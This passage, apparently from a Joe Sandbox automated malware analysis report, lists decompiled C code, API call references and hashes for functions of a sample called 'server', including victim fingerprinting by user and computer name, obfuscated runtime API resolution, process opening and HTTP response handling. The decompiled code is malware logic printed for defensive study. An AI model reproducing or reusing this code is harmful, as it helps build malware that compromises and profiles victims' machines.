								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02BD33DC(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E02BD61DA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02BD16B2( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02bd3fa5
0x02bd3fa5
0x02bd3fb5
0x02bd3fb8
0x02bd3fbc
0x02bd3fc2
0x02bd3fc7
0x02bd3fe0
0x02bd3ff4
0x02bd3ffb
0x02bd4002
0x02bd4055
0x02bd405b
0x02bd4061
0x02bd409c
0x02bd40a2
0x00000000
0x00000000
0x00000000
0x02bd4061
0x02bd4008
0x00000000
0x02bd400f
0x02bd401d
0x02bd4020
0x02bd4023
0x02bd402f
0x02bd4033
0x02bd4095
0x02bd4035
0x02bd4047
0x02bd4085
0x02bd4090
0x02bd4049
0x02bd404c
0x02bd4050
0x02bd4050
0x02bd4047
0x00000000
0x02bd4033
0x02bd4008
0x02bd3fcc
0x02bd3fd2
0x02bd3fd5
0x02bd3fda
0x00000000
0x00000000
0x00000000
0x02bd406a
0x02bd4072
0x02bd4077
0x02bd407a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02BD3FBC
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?), ref: 02BD3FCC
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD3FFE
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD4023
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD4043
GetLastError.KERNEL32 ref: 02BD4055

Part of subcall function 02BD16B2: WaitForMultipleObjects.KERNEL32(00000002,02BD7C47,00000000,02BD7C47,?,?,?,02BD7C47,0000EA60), ref: 02BD16CD

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

GetLastError.KERNEL32(00000000), ref: 02BD408A

Strings

@MqtNqt, xrefs: 02BD4055, 02BD408A

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MqtNqt
API String ID: 3369646462-2883916605
Opcode ID: 0fc7a39442a08f3192f21fee3716bb906f179f620d0c4ebb638ac18b02431607
Instruction ID: ff26188ffa7575cb7f21947577abb057c010b6ce4b19988ef29d539fac7a426f
Opcode Fuzzy Hash: 0fc7a39442a08f3192f21fee3716bb906f179f620d0c4ebb638ac18b02431607
Instruction Fuzzy Hash: E6311CB5D00709EFDB20DFE5D8849DEBBB8EB08344F5449A9E502E2141E771AA44DF51

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7238 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E02BD7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x2bda3dc; // 0x35b9ce8
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E02BD6ABD();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E02BD6ABD();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E02BD42E9(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E02BD42E9(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E02BD398D(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x2bd918c;
						}
						_t70 = E02BD5FA1(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E02BD33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x2bda348; // 0x9dd5a8
								_t102 =  *0x2bda138; // 0x2bd7ddd
								_t28 = _t105 + 0x2bdbd10; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E02BD398D(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x2bd9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E02BD33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E02BD61DA(_v24);
								} else {
									_t92 =  *0x2bda348; // 0x9dd5a8
									_t44 = _t92 + 0x2bdba20; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E02BD61DA(_v8);
						}
						E02BD61DA(_v12);
					}
					E02BD61DA(_v16);
				}
				return _v28;
			}

0x02bd723e
0x02bd7246
0x02bd7249
0x02bd7256
0x02bd7259
0x02bd7260
0x02bd7267
0x02bd726a
0x02bd7277
0x02bd727a
0x02bd727d
0x02bd7282
0x02bd7287
0x02bd728f
0x02bd7294
0x02bd7299
0x02bd729f
0x02bd72a3
0x02bd72ac
0x02bd72b0
0x02bd72b2
0x02bd72b2
0x02bd72ba
0x02bd72bf
0x02bd72c4
0x02bd72ca
0x02bd72d1
0x02bd72e2
0x02bd72e9
0x02bd72fb
0x02bd7300
0x02bd7305
0x02bd730e
0x02bd7317
0x02bd7320
0x02bd7336
0x02bd733b
0x02bd733f
0x02bd7343
0x02bd7348
0x02bd734d
0x02bd734f
0x02bd734f
0x02bd7359
0x02bd7362
0x02bd7369
0x02bd7385
0x02bd7389
0x02bd73c2
0x02bd738b
0x02bd738e
0x02bd7396
0x02bd73a7
0x02bd73af
0x02bd73b7
0x02bd73bb
0x02bd73bb
0x02bd7389
0x02bd73ca
0x02bd73ca
0x02bd73d2
0x02bd73d2
0x02bd73da
0x02bd73da
0x02bd73e6

APIs

GetTickCount.KERNEL32 ref: 02BD7250
lstrlen.KERNEL32(00000000,00000005), ref: 02BD72D1
lstrlen.KERNEL32(?), ref: 02BD72E2
lstrlen.KERNEL32(00000000), ref: 02BD72E9
lstrlenW.KERNEL32(80000002), ref: 02BD72F0
lstrlen.KERNEL32(?,00000004), ref: 02BD7359
lstrlen.KERNEL32(?), ref: 02BD7362
lstrlen.KERNEL32(?), ref: 02BD7369
lstrlenW.KERNEL32(?), ref: 02BD7370

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 8623d53d2abf1b87174ffa1f4bc03734e17818834b16d1b83971c0b4c42569e3
Instruction ID: 4de68f362a264f72455e68e744978e5393dbd15307c5a8c6b101d6e77ae68b0e
Opcode Fuzzy Hash: 8623d53d2abf1b87174ffa1f4bc03734e17818834b16d1b83971c0b4c42569e3
Instruction Fuzzy Hash: 1E516E32D4021AABCF11AFA4DC44ADE7BB6EF44364F0580A5ED18A7250EB35CA25DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD1340() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x775ec742
						_v12 = _v12 + _t11;
						_t64 = E02BD33DC(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02BD61DA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2bd3e01
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02bd134e
0x02bd1351
0x02bd1354
0x02bd135a
0x02bd135f
0x02bd1365
0x02bd136d
0x02bd1370
0x02bd1376
0x02bd137b
0x02bd1384
0x02bd1388
0x02bd1395
0x02bd1399
0x02bd139b
0x02bd139f
0x02bd13a2
0x02bd13b2
0x02bd1405
0x02bd1406
0x02bd13b4
0x02bd13b9
0x02bd13ba
0x02bd13bf
0x02bd13c2
0x02bd13d5
0x00000000
0x02bd13d7
0x02bd13da
0x02bd13df
0x02bd13ed
0x02bd13f0
0x02bd13f6
0x02bd13fb
0x00000000
0x02bd13fd
0x02bd13fd
0x02bd1400
0x02bd1400
0x02bd13fb
0x02bd13d5
0x02bd140b
0x02bd140c
0x02bd137b
0x02bd1412

APIs

GetUserNameW.ADVAPI32(00000000,02BD3DFF), ref: 02BD1354
GetComputerNameW.KERNEL32(00000000,02BD3DFF), ref: 02BD1370

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

GetUserNameW.ADVAPI32(00000000,02BD3DFF), ref: 02BD13AA
GetComputerNameW.KERNEL32(02BD3DFF,775EC740), ref: 02BD13CD
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BD3DFF,00000000,02BD3E01,00000000,00000000,?,775EC740,02BD3DFF), ref: 02BD13F0

Strings

@hqt, xrefs: 02BD13F0

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID: @hqt
API String ID: 3850880919-2648236075
Opcode ID: c3577122318c0a5275e25c89f124b814b2f220af360e558ad6c5a21adfb3e328
Instruction ID: 87c97d8bdf5b3aa1ad6e7a2c4147b4ff7ca33ff52f2a1432e9ae0a1364d9ed57
Opcode Fuzzy Hash: c3577122318c0a5275e25c89f124b814b2f220af360e558ad6c5a21adfb3e328
Instruction Fuzzy Hash: 2E21D476900208FFCB11DFE9D9849EEBBBCEF48244B5444AAE505E7240EB30AB45DF20

Uniqueness

Uniqueness Score: -1.00%

Function 02BD54D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD54D8(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2bda30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2bda2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2bda2f8 = _t6;
					 *0x2bda304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2bda2f4 = _t7;
					if(_t7 == 0) {
						 *0x2bda2f4 =  *0x2bda2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02bd54e0
0x02bd54e6
0x02bd54ed
0x00000000
0x02bd5547
0x02bd54ef
0x02bd54f7
0x02bd5504
0x02bd5504
0x02bd5544
0x00000000
0x02bd5544
0x02bd5506
0x02bd5506
0x02bd550b
0x02bd551d
0x02bd5522
0x02bd5528
0x02bd552e
0x02bd5535
0x02bd5537
0x02bd5537
0x00000000
0x02bd553e
0x02bd5500
0x00000000
0x00000000
0x02bd5502
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BD5037,?), ref: 02BD54E0
GetVersion.KERNEL32 ref: 02BD54EF
GetCurrentProcessId.KERNEL32 ref: 02BD550B
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02BD5528
GetLastError.KERNEL32 ref: 02BD5547

Strings

@MqtNqt, xrefs: 02BD5547

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MqtNqt
API String ID: 2270775618-2883916605
Opcode ID: 98e0c0a82d507b4efbe6d691ba8c594361b2e3e87f0e853f83db7f46935bcab3
Instruction ID: c65b91a908531f1d1b0aae4f502687116073f5aacff933aef23b13405bbfb9e4
Opcode Fuzzy Hash: 98e0c0a82d507b4efbe6d691ba8c594361b2e3e87f0e853f83db7f46935bcab3
Instruction Fuzzy Hash: 1CF03CB0AC2703DBD7258B25A82ABD43BA3E704799F904869E596C71C1F77590A0CB19

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3A63 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02BD3ABD
SysAllocString.OLEAUT32(0070006F), ref: 02BD3AD1
SysAllocString.OLEAUT32(00000000), ref: 02BD3AE3
SysFreeString.OLEAUT32(00000000), ref: 02BD3B4B
SysFreeString.OLEAUT32(00000000), ref: 02BD3B5A
SysFreeString.OLEAUT32(00000000), ref: 02BD3B65

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8e57b440f0c2d66bc307e93fe3ae6bd126363e830f7b4db80e430d87d2bf77ac
Instruction ID: 69d1d9393862b25bf6e2bcc9786162bb1ec0c149e7dff7bf6064d057328d2c14
Opcode Fuzzy Hash: 8e57b440f0c2d66bc307e93fe3ae6bd126363e830f7b4db80e430d87d2bf77ac
Instruction Fuzzy Hash: F9417F36D00A09ABDB01EFBCD844ADEB7BAEF49304F1444A6EA10EB151EB71D905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02BD6BF9 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02BD33DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2bda348; // 0x9dd5a8
					_t1 = _t23 + 0x2bdb436; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2bda348; // 0x9dd5a8
					_t2 = _t26 + 0x2bdb85c; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02BD61DA(_t54);
					} else {
						_t30 =  *0x2bda348; // 0x9dd5a8
						_t5 = _t30 + 0x2bdb849; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2bda348; // 0x9dd5a8
							_t7 = _t33 + 0x2bdb72b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2bda348; // 0x9dd5a8
								_t9 = _t36 + 0x2bdb883; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2bda348; // 0x9dd5a8
									_t11 = _t39 + 0x2bdb87b; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02BD7A08(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02bd6c08
0x02bd6c0c
0x02bd6cce
0x02bd6c12
0x02bd6c12
0x02bd6c17
0x02bd6c2a
0x02bd6c2c
0x02bd6c31
0x02bd6c39
0x02bd6c40
0x02bd6c42
0x02bd6c47
0x02bd6cc6
0x02bd6cc7
0x02bd6c49
0x02bd6c49
0x02bd6c4e
0x02bd6c56
0x02bd6c58
0x02bd6c5d
0x00000000
0x02bd6c5f
0x02bd6c5f
0x02bd6c64
0x02bd6c6c
0x02bd6c6e
0x02bd6c73
0x00000000
0x02bd6c75
0x02bd6c75
0x02bd6c7a
0x02bd6c82
0x02bd6c84
0x02bd6c89
0x00000000
0x02bd6c8b
0x02bd6c8b
0x02bd6c90
0x02bd6c98
0x02bd6c9a
0x02bd6c9f
0x00000000
0x02bd6ca1
0x02bd6ca7
0x02bd6cac
0x02bd6cb3
0x02bd6cb8
0x02bd6cbd
0x00000000
0x02bd6cbf
0x02bd6cc2
0x02bd6cc2
0x02bd6cbd
0x02bd6c9f
0x02bd6c89
0x02bd6c73
0x02bd6c5d
0x02bd6c47
0x02bd6cdc

APIs

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD37FB,?,?,?,?,00000000,00000000), ref: 02BD6C1E
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD6C40
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD6C56
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD6C6C
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD6C82
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD6C98

Part of subcall function 02BD7A08: memset.NTDLL ref: 02BD7A87

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: fbfd30f9d80276cf790c7253d1f6d6dd313007309c8e12f5493dbf7b2d529e70
Instruction ID: aea7363b5d958dbbfd69f9c4b057770c19d40cdef9c5b7bc8078808b96b81c9c
Opcode Fuzzy Hash: fbfd30f9d80276cf790c7253d1f6d6dd313007309c8e12f5493dbf7b2d529e70
Instruction Fuzzy Hash: 6D217FB064170BAFD710DF6AEA44EDAB7ECEF043587064865E405C7251FBB0EA088F60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4C94 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02BD4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2bda3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E02BD6536( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02BD313F(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02BD61DA(_a8);
						goto L29;
					}
					_t64 =  *0x2bda318; // 0x35b9e40
					_t16 = _t64 + 0xc; // 0x35b9f62
					_t65 = E02BD6536(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02bd90
						if(E02BD7767(_t97,  *_t33, _t91, _a8,  *0x2bda3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2bda348; // 0x9dd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2bdbb5a; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2bdbbac; // 0x55434b48
								_t69 = _t34;
							}
							if(E02BD7238(_t69,  *0x2bda3d4,  *0x2bda3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2bda348; // 0x9dd5a8
									_t44 = _t71 + 0x2bdb332; // 0x74666f53
									_t73 = E02BD6536(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02bd90
										E02BD5B0E( *_t47, _t91, _a8,  *0x2bda3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d02bd90
										E02BD5B0E( *_t49, _t91, _t99,  *0x2bda3d0, _a16);
										E02BD61DA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02bd90
									E02BD5B0E( *_t40, _t91, _a8,  *0x2bda3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d02bd90
									E02BD5B0E( *_t43, _t91, _a8,  *0x2bda3d0, _a16);
								}
								if( *_t101 != 0) {
									E02BD61DA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02bd90
					_t81 = E02BD58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02bd90
							E02BD7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02BD61DA(_t100);
						_t98 = _a16;
					}
					E02BD61DA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02BD7AB0(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2bda3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02bd4c94
0x02bd4c9d
0x02bd4ca4
0x02bd4ca9
0x02bd4d16
0x02bd4d1c
0x02bd4d21
0x02bd4d28
0x02bd4d2d
0x02bd4d32
0x02bd4e9d
0x02bd4ea4
0x02bd4ea4
0x02bd4ea9
0x02bd4eab
0x02bd4eab
0x02bd4eb4
0x02bd4eb4
0x02bd4d38
0x02bd4d44
0x02bd4e93
0x02bd4e96
0x00000000
0x02bd4e96
0x02bd4d4a
0x02bd4d4f
0x02bd4d52
0x02bd4d57
0x02bd4d5c
0x02bd4da5
0x02bd4da5
0x02bd4db8
0x02bd4dc2
0x02bd4dc8
0x02bd4dcf
0x02bd4dd9
0x02bd4dd9
0x02bd4dd1
0x02bd4dd1
0x02bd4dd1
0x02bd4dd1
0x02bd4dfb
0x02bd4e03
0x02bd4e31
0x02bd4e36
0x02bd4e3d
0x02bd4e42
0x02bd4e46
0x02bd4e78
0x02bd4e48
0x02bd4e55
0x02bd4e58
0x02bd4e68
0x02bd4e6b
0x02bd4e71
0x02bd4e71
0x02bd4e05
0x02bd4e12
0x02bd4e15
0x02bd4e27
